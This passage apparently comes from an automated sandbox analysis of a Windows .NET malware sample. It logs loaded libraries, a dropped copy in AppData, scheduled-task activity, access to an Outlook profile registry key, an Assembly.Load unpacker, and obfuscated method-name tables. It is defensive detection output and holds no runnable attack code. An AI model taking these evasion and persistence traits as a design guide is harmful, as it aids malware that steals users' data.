                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: mpclient.dll
                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: secur32.dll
                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sspicli.dll
                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: version.dll
                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: msasn1.dll
                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: kernel.appcore.dll
                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: userenv.dll
                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: gpapi.dll
                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: wbemcomn.dll
                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: amsi.dll
                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: profapi.dll
                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: wscapi.dll
                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: urlmon.dll
                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: iertutil.dll
                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: srvcli.dll
                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: netutils.dll
                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: slc.dll
                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sppc.dll
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: UOEAjWmusE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: UOEAjWmusE.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: UOEAjWmusE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: gATZ.pdbSHA256% source: UOEAjWmusE.exe, gJdonuKfIrqN.exe.0.dr
                  Source: Binary string: gATZ.pdb source: UOEAjWmusE.exe, gJdonuKfIrqN.exe.0.dr

                  Data Obfuscation

                  barindex
                  .NET source code contains potential unpacker
                  Source: 0.2.UOEAjWmusE.exe.47e14e0.2.raw.unpack, CN5yYHyRFbwxLmQByk.cs.Net Code: N88TYOqMX2 System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.UOEAjWmusE.exe.483c900.0.raw.unpack, CN5yYHyRFbwxLmQByk.cs.Net Code: N88TYOqMX2 System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.UOEAjWmusE.exe.9970000.5.raw.unpack, CN5yYHyRFbwxLmQByk.cs.Net Code: N88TYOqMX2 System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.UOEAjWmusE.exe.55c0000.4.raw.unpack, MainForm.cs.Net Code: _206D_206A_206B_200E_200F_206F_206E_200C_200F_202B_202E_206A_200C_202A_200C_206D_200C_206F_200C_206E_202E_200B_202B_200D_206C_206C_200E_200D_200D_200F_206D_206F_206A_206F_200D_206C_202C_206D_206C_206C_202E System.Reflection.Assembly.Load(byte[])
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeCode function: 0_2_053D46B8 pushad ; retf 0_2_053D46B9
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeCode function: 0_2_053D387B pushfd ; ret 0_2_053D3881
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeCode function: 0_2_053DDA4B push ecx; ret 0_2_053DDA4C
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeCode function: 0_2_059B296A push ebx; iretd 0_2_059B2A4C
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeCode function: 12_2_0111F273 push ebp; retf 12_2_0111F281
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeCode function: 12_2_01117E59 push edx; ret 12_2_01117E5A
                  Source: UOEAjWmusE.exeStatic PE information: section name: .text entropy: 7.495982404795054
                  Source: gJdonuKfIrqN.exe.0.drStatic PE information: section name: .text entropy: 7.495982404795054
                  Source: 0.2.UOEAjWmusE.exe.47e14e0.2.raw.unpack, ykwq833Z6B34s0VEfhO.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'SChdqw9LmL', 'YtodEci6Vc', 'whBdx4EvCw', 'aYpdKE7Iak', 'SxOdVaVCrI', 'J9KdiWTVoc', 'VCZdJbWmSo'
                  Source: 0.2.UOEAjWmusE.exe.47e14e0.2.raw.unpack, X7jrSvhQLCk3tcEVBO.csHigh entropy of concatenated method names: 'Lqbet3XrpT', 'yepeFRTUMv', 'vvgepHf6w4', 'spYeh5uQUR', 'bkYeRBBNfJ', 'mFbeCmfPEs', 'eIxekiHMYK', 'E0GeXiTul5', 'i6JecjWPiE', 'B0bednuIjv'
                  Source: 0.2.UOEAjWmusE.exe.47e14e0.2.raw.unpack, uSEF6mPAc9wdH36276.csHigh entropy of concatenated method names: 'BFk8o7eh1k', 'vjg8WmN7Tp', 'c6P8Y9kVMv', 'iKo8tJTluc', 'NwP8NWNrID', 'Af98FjeEJj', 'NWk8SRZXy1', 'rML8p5tw03', 'oym8hAmrY1', 'fEJ8639kWA'
                  Source: 0.2.UOEAjWmusE.exe.47e14e0.2.raw.unpack, KJ5FuO6XoQatL5oLIw.csHigh entropy of concatenated method names: 'xTi4NhFv4Z', 'hiZ4SMGQ7r', 'QsGevD00J1', 'nUUe2Ph6TR', 'ojDeOsIMnY', 'gGmefpFBsc', 'XU3e518Mcp', 'LSiewmIYWF', 'OucePwld3h', 'dc5e7fiR7a'
                  Source: 0.2.UOEAjWmusE.exe.47e14e0.2.raw.unpack, ihJ4FBKXUtjaE3ggN7.csHigh entropy of concatenated method names: 'B9xR7ZXdOv', 'TtXREu5toR', 'bCNRK2B8hT', 'FXqRVvK8AG', 'Te8R1xAI8V', 'oEyRvnLxJC', 'afWR2uoyXv', 'CZEROdSHhD', 'OkDRfERTHp', 'XpKR5SokOX'
                  Source: 0.2.UOEAjWmusE.exe.47e14e0.2.raw.unpack, pAofq3JBjTtJlGsXSM.csHigh entropy of concatenated method names: 'esukDZONPH', 'X77kQcwBHY', 'ToString', 'RHfkrrNPHl', 'Cdak0YfWQR', 'Bx4ke3CBDb', 'dyAk4oUEs8', 'GkgklViage', 'nIVk8JnjiD', 'OYZky5J6oa'
                  Source: 0.2.UOEAjWmusE.exe.47e14e0.2.raw.unpack, U1KWHpiL3OAw2XEwe2.csHigh entropy of concatenated method names: 'ToString', 'uyECqB6txv', 'r5nC1AWgZK', 'WteCvY9Opv', 'pg3C2PxUeI', 'IOyCOE20Kr', 'i6MCfnLiVw', 'jjcC5BsRRa', 'cm7Cw83Orp', 'kHaCPbwxPX'
                  Source: 0.2.UOEAjWmusE.exe.47e14e0.2.raw.unpack, DO0t4SpngkX2NaXBd4.csHigh entropy of concatenated method names: 'GHJ0KRk8XU', 'rYq0VxYhdQ', 'dWp0ijNjTd', 'a8r0J6iNHT', 'hlO0MfHkiI', 'xFE0UOifdT', 'Yyf0je3bnu', 'cc40BjiMhN', 'CtT0ambyAn', 'mjh0G598i1'
                  Source: 0.2.UOEAjWmusE.exe.47e14e0.2.raw.unpack, ALe4H1aZrGP7WZgId3.csHigh entropy of concatenated method names: 'dAac9HFTDg', 'JXrc1MnFFT', 'rkVcvVmXTx', 'GTCc2kF7wW', 'AntcOudjc6', 'JQIcfS3AQw', 'Bgrc5omRXh', 'H1ycwkEMqL', 'qw1cPOR4Gl', 'Mv1c7ix2bh'
                  Source: 0.2.UOEAjWmusE.exe.47e14e0.2.raw.unpack, ah53opGUxTfCHXjgD8.csHigh entropy of concatenated method names: 'NuydesgTHH', 'hpOd4BmPXM', 'OP1dleVxfx', 'hK2d86pw9n', 'aqqdcB343u', 'vo2dyDjIWI', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 0.2.UOEAjWmusE.exe.47e14e0.2.raw.unpack, to3XjkU4G0PFJ9T0Kr.csHigh entropy of concatenated method names: 'SMykBk8dth', 'pCqkGByyNm', 'JwAXZcsjRF', 'X7rX3uofVm', 'uMJkqTaRTm', 'ROQkELKVwD', 'HalkxBVOLR', 'lFtkK4BlWd', 'ao4kV5Yo6W', 'q0nkiEfP9q'
                  Source: 0.2.UOEAjWmusE.exe.47e14e0.2.raw.unpack, CN5yYHyRFbwxLmQByk.csHigh entropy of concatenated method names: 'eoAgns4WsC', 'oewgrIdyn9', 'FThg0CQurM', 'tt0ge7rQb6', 'Cdxg4A92dg', 'NSngltJugh', 'cqmg8SThhh', 'arDgycGxxP', 'UTggAcMUNr', 'g2jgDcJfwf'
                  Source: 0.2.UOEAjWmusE.exe.47e14e0.2.raw.unpack, xQPiMs0Su5EiSHtEVc.csHigh entropy of concatenated method names: 'Dispose', 'CwA3aOX9aO', 'kkWI15meV3', 'OuYWgVV7FW', 'AKm3GFmnwp', 'Vo23z8VPZD', 'ProcessDialogKey', 'NItIZLe4H1', 'arGI3P7WZg', 'cd3IIZh53o'
                  Source: 0.2.UOEAjWmusE.exe.47e14e0.2.raw.unpack, FZAVh29FgqEruZXF2d.csHigh entropy of concatenated method names: 'I2llnKLLOD', 'qrcl022U06', 'zFil4GIPKQ', 'rH2l8rtolS', 'TF5lyEyVnp', 'BwF4MgLqgB', 'mmv4UtQav6', 'xTw4jaltOx', 'MeY4BngpOi', 'EZP4aby8S2'
                  Source: 0.2.UOEAjWmusE.exe.47e14e0.2.raw.unpack, VZ6G5a33HLJq5VC6DiA.csHigh entropy of concatenated method names: 'ivMdGGxVgR', 'S8pdze52nK', 'tJ2LZhrfkN', 'vGXL36Csca', 'QjALIKsyJs', 'bA0LgWCOIo', 'UPOLTwiidv', 'nYuLnv6Owy', 'hVhLrhtaZ2', 'Kt9L0v7WXW'
                  Source: 0.2.UOEAjWmusE.exe.47e14e0.2.raw.unpack, LZKDRPI5m93416evaE.csHigh entropy of concatenated method names: 'T4oYNrwkJ', 'NIZt6Xs1a', 'k1iFGsvfS', 'SgPSGelPd', 'FXIhhdpZ6', 'LQG64GFtU', 'DF7ricaPu4pE9LJJjs', 'g6e4FWCbSEnwyrYgAt', 'i7kXiOGeH', 'JrXdJ6HiN'
                  Source: 0.2.UOEAjWmusE.exe.47e14e0.2.raw.unpack, StXgmoxJK0VbLhPolI.csHigh entropy of concatenated method names: 'PjkmpTPNWc', 'WPOmhHfjmC', 'jINm9aaNLV', 'J2fm1Z9dNC', 'G8tm2kx90h', 'JiOmOF4CEp', 'ce1m5WjHvO', 'PplmwrMq3P', 'D9Nm7QvJOp', 'BYsmqZZ9og'
                  Source: 0.2.UOEAjWmusE.exe.47e14e0.2.raw.unpack, jReNHLjXOSwAOX9aOt.csHigh entropy of concatenated method names: 'AChcR2nSji', 'xa4ckfAS7Y', 'iGRcc5rewK', 'j3qcLG9HUM', 'EKEcuvN0MS', 'I8qcsnf9LB', 'Dispose', 'N8XXrsbjKp', 'sNYX0vn4Ru', 'Y1AXeA4cPA'
                  Source: 0.2.UOEAjWmusE.exe.47e14e0.2.raw.unpack, v28Va1zOGSaDoSRTxf.csHigh entropy of concatenated method names: 'FG9dFa0y9R', 'xGEdpPtRES', 'QiYdhQvcD5', 'Im0d9DeQTX', 'xkTd1hEha5', 'yGRd2NGPaR', 'XHydOdHUjY', 'HrKdsfft78', 'LxKdoOPPib', 'xTgdWybeqc'
                  Source: 0.2.UOEAjWmusE.exe.47e14e0.2.raw.unpack, zDbEFX5MNIQlmgofDa.csHigh entropy of concatenated method names: 'VJD8rgLbCE', 'Anr8eocsSE', 'Cc28lx16QL', 'jrblG1urGk', 'LSvlze9XTo', 'ABK8Zi2pFR', 'Qia83BX9EZ', 'a7G8Ikr8Bh', 'xaB8gLBiZG', 'HNT8Tt4vGA'
                  Source: 0.2.UOEAjWmusE.exe.47e14e0.2.raw.unpack, A0hF9CTSjuKdGsFWh7.csHigh entropy of concatenated method names: 'QHp38O0t4S', 'egk3yX2NaX', 'HQL3DCk3tc', 'PVB3QO5J5F', 'LoL3RIw6ZA', 'Sh23CFgqEr', 'tai0JrrS3hy1ypYyiK', 'H8XS5NFrqFUSIG8IyC', 'DLL33MpYNY', 'M9R3geTFe6'
                  Source: 0.2.UOEAjWmusE.exe.483c900.0.raw.unpack, ykwq833Z6B34s0VEfhO.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'SChdqw9LmL', 'YtodEci6Vc', 'whBdx4EvCw', 'aYpdKE7Iak', 'SxOdVaVCrI', 'J9KdiWTVoc', 'VCZdJbWmSo'
                  Source: 0.2.UOEAjWmusE.exe.483c900.0.raw.unpack, X7jrSvhQLCk3tcEVBO.csHigh entropy of concatenated method names: 'Lqbet3XrpT', 'yepeFRTUMv', 'vvgepHf6w4', 'spYeh5uQUR', 'bkYeRBBNfJ', 'mFbeCmfPEs', 'eIxekiHMYK', 'E0GeXiTul5', 'i6JecjWPiE', 'B0bednuIjv'
                  Source: 0.2.UOEAjWmusE.exe.483c900.0.raw.unpack, uSEF6mPAc9wdH36276.csHigh entropy of concatenated method names: 'BFk8o7eh1k', 'vjg8WmN7Tp', 'c6P8Y9kVMv', 'iKo8tJTluc', 'NwP8NWNrID', 'Af98FjeEJj', 'NWk8SRZXy1', 'rML8p5tw03', 'oym8hAmrY1', 'fEJ8639kWA'
                  Source: 0.2.UOEAjWmusE.exe.483c900.0.raw.unpack, KJ5FuO6XoQatL5oLIw.csHigh entropy of concatenated method names: 'xTi4NhFv4Z', 'hiZ4SMGQ7r', 'QsGevD00J1', 'nUUe2Ph6TR', 'ojDeOsIMnY', 'gGmefpFBsc', 'XU3e518Mcp', 'LSiewmIYWF', 'OucePwld3h', 'dc5e7fiR7a'
                  Source: 0.2.UOEAjWmusE.exe.483c900.0.raw.unpack, ihJ4FBKXUtjaE3ggN7.csHigh entropy of concatenated method names: 'B9xR7ZXdOv', 'TtXREu5toR', 'bCNRK2B8hT', 'FXqRVvK8AG', 'Te8R1xAI8V', 'oEyRvnLxJC', 'afWR2uoyXv', 'CZEROdSHhD', 'OkDRfERTHp', 'XpKR5SokOX'
                  Source: 0.2.UOEAjWmusE.exe.483c900.0.raw.unpack, pAofq3JBjTtJlGsXSM.csHigh entropy of concatenated method names: 'esukDZONPH', 'X77kQcwBHY', 'ToString', 'RHfkrrNPHl', 'Cdak0YfWQR', 'Bx4ke3CBDb', 'dyAk4oUEs8', 'GkgklViage', 'nIVk8JnjiD', 'OYZky5J6oa'
                  Source: 0.2.UOEAjWmusE.exe.483c900.0.raw.unpack, U1KWHpiL3OAw2XEwe2.csHigh entropy of concatenated method names: 'ToString', 'uyECqB6txv', 'r5nC1AWgZK', 'WteCvY9Opv', 'pg3C2PxUeI', 'IOyCOE20Kr', 'i6MCfnLiVw', 'jjcC5BsRRa', 'cm7Cw83Orp', 'kHaCPbwxPX'
                  Source: 0.2.UOEAjWmusE.exe.483c900.0.raw.unpack, DO0t4SpngkX2NaXBd4.csHigh entropy of concatenated method names: 'GHJ0KRk8XU', 'rYq0VxYhdQ', 'dWp0ijNjTd', 'a8r0J6iNHT', 'hlO0MfHkiI', 'xFE0UOifdT', 'Yyf0je3bnu', 'cc40BjiMhN', 'CtT0ambyAn', 'mjh0G598i1'
